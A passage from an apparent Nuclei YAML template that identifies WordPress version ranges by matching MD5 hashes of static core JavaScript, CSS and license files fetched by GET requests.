md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"db523749051a987a9bf69e1dcc68c85a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/backbone.min.js" - matchers: - - type: dsl - name: 4.6 - 5.0.11 - dsl: - - "(\"9263ddbe52f85e7be13301ac26889c8e\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"198da1987a056bee56437d5bc3c9c176\" == md5(body))" - - type: dsl - name: 4.2 - 4.4.24 - dsl: - - "(\"88fee57a12be8ea719ed85fe29f062d3\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"6d6bc60cd42263c2ffd0b4b6523400c5\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"09622714468a28bca3cac046ee92d8f6\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"9f8b43fd1df78dca0827c73e29890865\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"710b5fe97d75f4305cd8dd472aae4132\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"2781e10bd1b33dacb15e164e8a1e872e\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"dcbe63759afdeb816d8ddc8a659d2764\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/media-upload.min.js" - matchers: - - type: dsl - name: 4.6 - 5.0.11 - dsl: - - "(\"f320174ed63de275264dcf5430c309dc\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"e92fc3fab3c608da250c11fe97d96680\" == md5(body))" - - type: dsl - name: 4.0 - 4.4.24 - dsl: - - "(\"61ea709a3314ba200a885e2465267aa2\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"1131334fb18ce021bf24a79cf8030eeb\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"6f56f6255bf7f1a228c15903bb652202\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"159be51feb8551297e0831216561c064\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"878d3eefdc8ff87d256f1231fd6e8d22\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"dc4728d88b26a69d23c41eea46362cdb\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"3427781751e43fa30defb3c3686e0f4f\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"fd70aa581d90f2cf9f29ab3ed406e60a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/customize-widgets.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"a3d193608a06b479ec5ef684d6281897\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"49f0ad63a90d6cf3146aef5f705361ad\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"a138d6e9d8e9b3d4d2a9eafff00f5ee5\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"952f708830650396ef92ebe8b1bfe4e5\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"8bb04d6e7cb432209ea569d82301f14a\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"7cec3fb121b9608cfb8c6a089bdc1a78\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"a4b28b10d15c63e0e9aacea727f2e954\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"1a76cb6fbbeea2d6d2f777a9a68c3950\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"f35e5a714f46d769b8dcb01fe6adf942\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"a8fde8741e7a5eef99c890bcf80a1330\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"fa3f72f6943c0ef9f20b7af1febddf4b\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"4e338ddee64e1284d5fc128c1d68d3ce\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"91fb0f195883f5a2160f8fbc3c972efc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/customize-widgets-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"1ce61fc960a92535e1df36b9406849cb\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"7dd2a79d285e607be1ac31534fa8c6f1\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"e9eb10161f31b6b7d1771ee567fc135b\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"2564cfc6fab696cf92ca7db8bf2bfc17\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"423dfcdad5293cfcebfa0ddeb2b61226\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"7ab3411bcab95d99021791a7da6a39c8\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"a97de8b82ec8b15faf9b1d529d408527\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"770dc42adb777ab40a74fa6c5b23840c\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"e780700354f7e9e075448078b58814a9\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"13f8d82516b5553205c3be870508316b\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"19e5373be67edc6a75533b48fb484b9f\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"d86d15f33703587a4af713132b2936be\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"19e9694fa284d071ca66669ad50ac87e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/zxcvbn.min.js" - matchers: - - type: dsl - name: 4.8 - 5.3.6 - dsl: - - "(\"a0ba2f2c8a1dd2594208e4f45b50b390\" == md5(body))" - - type: dsl - name: 3.8 - 4.7.19 - dsl: - - "(\"a14cd5113bd0d57563c1a9b63cae05f8\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"01bae5101bd40c4d24029dbfa20373d2\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"027c098ebca6235056092f7b954dfc5f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js" - matchers: - - type: dsl - name: 4.2 - 5.3.6 - dsl: - - "(\"640cbc0058638c4fb0400370dbcf25a3\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"dac11175ce0497c386f2ec1f2bb18983\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"d120118d8ed5d92bfdec395da0e05a49\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"0efc4bcc2e90416a5f996d9572236995\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js" - matchers: - - type: dsl - name: 3.9 - 5.3.6 - dsl: - - "(\"06f7aecb5bdfa28739eea0a498d15a81\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"04e5571b65e28e863f92fc4ee3f07414\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpgallery/plugin.js" - matchers: - - type: dsl - name: 4.4 - 5.3.6 - dsl: - - "(\"9d48345044e6111fbeb9d2fb444d5c49\" == md5(body))" - - type: dsl - name: 4.1 - 4.3.25 - dsl: - - "(\"b10eadbf41e88b236ac764bd26e653f9\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"4d37465e93855c2c01c9c60c6dda689c\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"c71b815f13d17651385fc624cd3fa490\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/langs/wp-langs-en.js" - matchers: - - type: dsl - name: 4.1 - 5.3.6 - dsl: - - "(\"08f8669f7453b17563a62e6bbb376137\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"c1dbeecd27447d90fc2a188c58586ad3\" == md5(body))" - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"260c1cc4baa6208fad1e01788c56e30b\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"7db3698995b52c5eccad285d5d790355\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"1bade867eefc05658954aed300779c6d\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"8dd6727e3c05b901c98c664b0387d684\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"61428dd239102f7c4e8cff821fed5a9f\" == md5(body))" - - type: dsl - name: 2.7 - 3.0.6 - dsl: - - "(\"6f3b5dc08823e70c717422e13b3ce1c9\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"aef70efd73e08f832ffa1871e08fb3d4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/farbtastic-rtl.css" - matchers: - - type: dsl - name: 3.8 - 5.3.6 - dsl: - - "(\"118f1189ffbb71e014402121b5456bc2\" == md5(body))" - - type: dsl - name: 2.8 - 3.2.1 - dsl: - - "(\"117dc1e6ac587635c98975cfcdfb0444\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"c188b80c09449490eeea135cbdbaa4f7\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"c2370ae59e15c0b0299a7b89ee93fb17\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/l10n-rtl.css" - matchers: - - type: dsl - name: 4.6 - 5.3.6 - dsl: - - "(\"69b0527be5b3aa2c1644fe5fc1c34afa\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"f39bf70450b95eb669ac26bb12f6a7d2\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"cabc44df7d4f2fa084496d62a1c9db53\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"fcb0063a38cf8348351737634db3f947\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"ed7b18351eecc9ba8b2b65e634696e40\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"53e5c8837adee91b40f85796824297c0\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"dc59fb5a6c510e3856c86d5d9df08328\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"17786dc78f167ce19373f8cac1a341bd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/iris.min.js" - matchers: - - type: dsl - name: 4.7 - 5.3.6 - dsl: - - "(\"45076064fdcbfcf9f5c8996e10ac4bc9\" == md5(body))" - - type: dsl - name: 4.1 - 4.6.20 - dsl: - - "(\"75c63560c640c4a6c31f5565dfb0e8a9\" == md5(body))" - - type: dsl - name: 3.8 - 4.0.32 - dsl: - - "(\"7407504e1137f61fd8a18ba18c82bc1b\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"d6537a873048d3725fb96cb99adc9b44\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"99948214c800f7f5cd08bdda7b31022e\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"f03190302132dd7dd43dc3c26ef616a4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/site-icon-rtl.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"06fa2062900ec9b9561403625050c939\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"fedcbcc78a6bb0af907fb6f96903510e\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"651951a752929e9254b3599b8496029a\" == md5(body))" - - type: dsl - name: 4.9 - 5.3.6 - dsl: - - "(\"843b8077b07dce1d6bd532aa7ad3e61b\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"f8fc0b81fa9a174c90445282c90b2a99\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/codemirror/csslint.js" - matchers: - - type: dsl - name: 4.9 - 5.3.6 - dsl: - - "(\"e1b73b2ee9f94bd0f0cace5f09fd8251\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"ebbcc94d5fcfb149e508a6b3f2c06cbd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/compat3x/plugin.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"8f0e27297dd73de76b24a8ee11ee683d\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"0bcfa3158493fcc012b28cc71cf62c12\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"5210cc9135346dcc15c9258eae55868a\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"790e3c426331bcdfbb33c636090b6194\" == md5(body))" - - type: dsl - name: 4.0 - 4.2.29 - dsl: - - "(\"3db45ca97f2d1bccc5c7ec65abbf8b55\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"751eb6f050f947374572ea1870482819\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.6 - dsl: - - "(\"2bdb6ec1c3d931d9ecbb169fcf6f5662\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"8fdf94194f514bb1519bea82ef95753e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/license.txt" - matchers: - - type: dsl - name: 4.5.5 - 4.9.1 - dsl: - - "(\"0d0434c8b176c525a6fce9cefdf8e106\" == md5(body))" - - type: dsl - name: 4.5 - 4.7 - dsl: - - "(\"a2b365a131a3aaa578bcce14ae9a0512\" == md5(body))" - - type: dsl - name: 3.9.15 - 4.4.14 - dsl: - - "(\"2c55b47570a0802d3ec40781d2d6adc9\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.4.5 - dsl: - - "(\"e6fa1601644f9ad7f2a8ed5f9671d0d5\" == md5(body))" - - type: dsl - name: 3.9.4 - 4.4 - dsl: - - "(\"3938fcd57688b4d7681a50d6a1f53e71\" == md5(body))" - - type: dsl - name: 3.9 - 4.1 - dsl: - - "(\"ae123513dd2e70337dafc9f57ece23fd\" == md5(body))" - - type: dsl - name: 3.7.6 - 3.8.16 - dsl: - - "(\"9f752d0964de81f51a66c7408f6a4253\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.5 - dsl: - - "(\"38770f444df2e78c4431ef84cc94b477\" == md5(body))" - - type: dsl - name: 3.7.17 - 3.8.25 - dsl: - - "(\"732b8b10f9f4e8af61ab94c713580149\" == md5(body))" - - type: dsl - name: 3.4 - 3.5.2 - dsl: - - "(\"b7d6694302f24cbe13334dfa6510fd02\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"405836dc36b41ce662dba3423eab616c\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"f8ad8fa91c45e9979d7cb58adb3686f4\" == md5(body))" - - type: dsl - name: 2.7 - 3.0.6 - dsl: - - "(\"4d1f767863b6a3985f43e9401b0739f6\" == md5(body))" - - type: dsl - name: 1.2.1 - 2.6.5 - dsl: - - "(\"c36b8609197b74b10c3b2db0533c0e1e\" == md5(body))" - - type: dsl - name: 0.71-gold - 2.3.3 - dsl: - - "(\"00a58df11c81a717b7441ba853dbf85f\" == md5(body))" - - type: dsl - name: 4.5.14 - 5.0.2 - dsl: - - "(\"9348da52c104f75fe1befc73609020cf\" == md5(body))" - - type: dsl - name: 3.9.24 - 4.4.24 - dsl: - - "(\"f5847c886a3ea0cce59e06a502686989\" == md5(body))" - - type: dsl - name: 3.7.26 - 3.8.35 - dsl: - - "(\"0f5ad1c4e89f08d3553fbae4b1141009\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.3.6 - dsl: - - "(\"40fc2f39d472a1bb52f4ebe59702e0c2\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"ad4c696c2b7a3971393d00c67bac0d05\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/quicktags.js" - matchers: - - type: dsl - name: 4.8 - 5.0.11 - dsl: - - "(\"bb36c516f8fd9ecc5d05b750f92cc1ae\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"481e904dd706f51af4bf2faa4070165b\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"213aa843be923e9b3cd4e8231551d01d\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"f623cad23a3ce005fcd054d9e5adcaad\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"3ea535778aa41165e0b6fdbe1fa7c4b4\" == md5(body))" - - type: dsl - name: 3.9 - 4.0 - dsl: - - "(\"75a2b7d66218b95cc439cd82daea731d\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"7b69ef69e6e9a070b872a6f95ec9c457\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"2a040163533eceee9b05c95216bf6764\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"cb35ecf64895decdb22a0f1ae83e4e7c\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"77a0503d00ffbf740d3572411c676724\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"4f9b1ffdbbe292ae09a17bd5638c8152\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"522dd357ce0e14c054e91851be2c7326\" == md5(body))" - - type: dsl - name: 2.8 - 3.1.4 - dsl: - - "(\"954c48f2a654620e6c8c286d6016d224\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"b70c650cff9a2601ba9d9aebf1215a6e\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"30ef4fe9bbc2a3259b0a1179f8b3f5d8\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"05f72f5183487b3d93ffdea33f521cff\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"bee34afdddc81cd7fb4375bc1950a4c3\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"13fae754baf95c39371e539c4b627dde\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"f7f1cad5bc1ad060439835b57d263709\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"3a7dd5f21f0185d288509c11dad9adcc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpemoji/plugin.js" - matchers: - - type: dsl - name: 4.5 - 5.0.11 - dsl: - - "(\"f77a6131c150653ddfa17a568a1962d0\" == md5(body))" - - type: dsl - name: 4.2 - 4.4.24 - dsl: - - "(\"1d793200d7b3e0f80818903ca5721bc7\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"671c895cbc8044b1c6145fba999eea7a\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"5345ad90ee783d64afa87ec1b1ab654d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/accordion.js" - matchers: - - type: dsl - name: 4.3 - 5.0.11 - dsl: - - "(\"ef3fe33d4ce12fe5254e5af1025ce70a\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"f25e56e30af6382e3770be437493373a\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"450d5207ff6942004d749e0ed59d8a16\" == md5(body))" - - type: dsl - name: 3.6 - 3.9.33 - dsl: - - "(\"481cc628a58bdbd7ac2e604321ae5fef\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"f2086c19efb64a0b66f05f46dd35ae9b\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"5d0833119cdd6d030e69e499b6ac26cc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/svg-painter.js" - matchers: - - type: dsl - name: 3.8 - 5.0.11 - dsl: - - "(\"87dcfbe97f902fa77cc4a9889c827afc\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"045eeffbb70b6f0cb98f444cd5b16c85\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"78b62a77d26a89151be971c140a1e382\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/custom-header.js" - matchers: - - type: dsl - name: 3.8 - 5.0.11 - dsl: - - "(\"32b3005887a4cb606fecc09c756605bb\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"955638fc743b925bb6425ac2c7e19903\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"bfdfbcd9ca2a53e91e857effb3410f0f\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"d02c557f15f702c040547ba4ebe7c21e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/gallery.js" - matchers: - - type: dsl - name: 4.4 - 5.0.11 - dsl: - - "(\"78cfa96506bf3965c18afa6de5b5abb6\" == md5(body))" - - type: dsl - name: 3.8 - 4.3.25 - dsl: - - "(\"1be9174b160c7eb40e6cdce4031ae89e\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"c46e25f07876b469e084d9b0696ea235\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"60bf226af2fd347b5a9deabe699a7a57\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"c18e6c65857266d2f189dbbf98374e43\" == md5(body))" - - type: dsl - name: 2.9 - 3.1.4 - dsl: - - "(\"59160556d01955e4eb91af2227f8722e\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"89772dfb0b8cc96168923a057ba97131\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"ee56b3e15c6013a01692799350229b75\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"80af48faad6e78172a7a3f4b612afd64\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"63b104e2188b3c9504fc58e7773425ad\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"3f1cbb95c0a95ede44aa549021984e9e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/media-upload.js" - matchers: - - type: dsl - name: 4.5 - 5.0.11 - dsl: - - "(\"94b464e9b4ec6b545486af795f24016d\" == md5(body))" - - type: dsl - name: 4.0 - 4.4.24 - dsl: - - "(\"5f66a88c118be462a566029db50aa3a2\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"da02ac15713968b6cff0bcafc4dfc0df\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"b2507d1ad5b4246899da37977f271477\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"a3767f4e61a7fd4fc7733fa50cffcf8d\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"8772e3e39912975229d15c246e828482\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"f119160af22c4dd7bd550b6392868678\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"a0f1e8bef23de300136e25af561cbe87\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"5cc83ad6cd63863e0dc5e20b810c9189\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"db178121dfb44e4208251c4723eb00c0\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"813637207d5f403cbc32feefb0ec32d7\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"7cbf5fe71bd15999b72f34671dfc4f6c\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"12e44ee24fd364725b547b797e72779c\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"5e579c9c6081deae17dffb254b4779aa\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"3fc8d4f8151f3ca1dc9804b947934218\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"983981007b91cd7973b474cbe0d3cf82\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets/media-audio-widget.js" - matchers: - - type: dsl - name: 4.8 - 5.0.11 - dsl: - - "(\"9afcfed7095623b2c6a90ffb3ed2489f\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"1853c2371eabae2afccfb72a5523edbe\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"5020494ddd3b703801766eb3c75bf453\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/revisions.js" - matchers: - - type: dsl - name: 4.8 - 5.0.11 - dsl: - - "(\"8d1b4d8308f2fc136df5dd875ee5529f\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.19 - dsl: - - "(\"4eb824b75d3e4d62bdc80a6d2a79a377\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"fd96dbd3b932f43a166651e4553cbf00\" == md5(body))" - - type: dsl - name: 4.1 - 4.3.25 - dsl: - - "(\"41f746a4087bec7e9b0db4152759d169\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"f6a37bc118b6b9c7b7b17617c1f969af\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"d86d279a545eca8e5e2b325b15f0a8e1\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"a80d81c448b0381a5e22fc7e4e09521e\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"a005233637f6f2564e710a0e4a5b0e1f\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"c5f20aa2e318716cc3b6f539c9528dd5\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"06814cc3d64f65157ab2bfb16e555219\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/shortcode.js" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"fc8cb580e0edc5cda1a550747d0de6c9\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"735f904b0d3315c8e51aca680bbb8056\" == md5(body))" - - type: dsl - name: 4.1 - 4.3.25 - dsl: - - "(\"eb207a02d03e3196d9d14ad139327fb5\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"457c14222f3c264b68ebcbe988e0efbf\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"7d4f49af7fc0f2a7f07b594bb280dff2\" == md5(body))" - - type: dsl - name: 3.8 - 3.9 - dsl: - - "(\"de6d7cb739e90fc6d6c43272bd0c3598\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"667dfe93afdf63592ca07ec403b05170\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"6e3848c6ea0f681f669a0c8f942bf41b\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"e97bf5b755c0c98bc63ed715b7fb3ff9\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"0540a810bff1d0c5e2c9507df353ce8a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/wp-mediaelement.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"8a628f94d5775fdf423f7cae30eb9453\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.19 - dsl: - - "(\"1d889c99f04a39573d4be5b346c6272f\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"3fc9c567b4fe652008ea1c14428c9363\" == md5(body))" - - type: dsl - name: 4.1 - 4.3.25 - dsl: - - "(\"9f38d89f0e227bebd5ba84ac75e10f5a\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"95c1dc92db0652488b6b3f48c55e40d1\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - 